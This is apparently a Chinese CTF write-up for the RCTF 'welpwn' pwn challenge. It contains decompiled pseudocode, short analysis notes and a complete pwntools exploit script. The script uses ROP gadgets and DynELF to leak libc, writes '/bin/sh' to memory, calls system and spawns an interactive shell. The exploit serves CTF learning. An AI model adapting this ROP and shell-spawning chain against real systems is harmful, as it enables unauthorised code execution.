伪源码
{
char buf; // [sp+0h] [bp-400h]@1
alarm(0xAu);
write(1, "Welcome to RCTF\n", 0x10uLL);
fflush(_bss_start);
read(0, &buf, 0x400uLL);
echo(&buf, &buf);
return 0;
}
学过DynELF
就再不怕,出题人你什么都不给了!
仔细分析
1.64位的传参不能直接放
2.gadget片段的选取,应该怎么选择
3.IDA好像没看出来,哪里存在溢出(自己没有进入echo查看)
4.echo:http://www.zsythink.net/archives/96/
EXP(后期补写脚本历程)
#!/usr/bin/python
#coding:utf-8
from pwn import*
p = process('./welpwn')
elf = ELF("welpwn")
write_got_addr = elf.got['write']
write_addr = elf.plt['write']
read_addr = elf.plt['read']
read_got_addr = elf.got['read']
start_addr = 0x400630
pop_gadget1 = 0x40089a
mov_gadget2 = 0x400880
pop4_addr = 0x40089c
where_bin_sh_addr = 0x6010d0
pop1_addr = 0x4008a3
def leak(addr):
p.recv(timeout = 0.1)
payload = 'A'*24
payload += p64(pop4_addr)
payload += p64(pop_gadget1)
payload += p64(0) #rbx
payload += p64(1) #rbp
payload += p64(write_got_addr)
payload += p64(8)
payload += p64(addr)
payload += p64(1)
payload += p64(mov_gadget2)
payload += "A"*56 #?
payload += p64(start_addr)
payload = payload.ljust(1024,"B")
p.send(payload) #!!!
content = p.recv(4)
p.recv(timeout = 0.1)
print ("%#x -> %s"%(addr,(content or '').encode('hex')))
return content
#gdb.attach(p)
d = DynELF(leak, elf = elf)
system_addr = d.lookup("system","libc")
log.info("system_addr = %#x",system_addr)
payload = "A"*24
payload += p64(pop4_addr)
payload += p64(pop_gadget1)
payload += p64(0)
payload += p64(1)
payload += p64(read_got_addr)
payload += p64(8)
payload += p64(where_bin_sh_addr)
payload += p64(0)
payload += p64(mov_gadget2)
payload += "A"*56
payload += p64(pop1_addr)
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)
payload = payload.ljust(1024,"b")
p.sendline(payload)
p.send("/bin/sh\x00")
p.interactive()
网友评论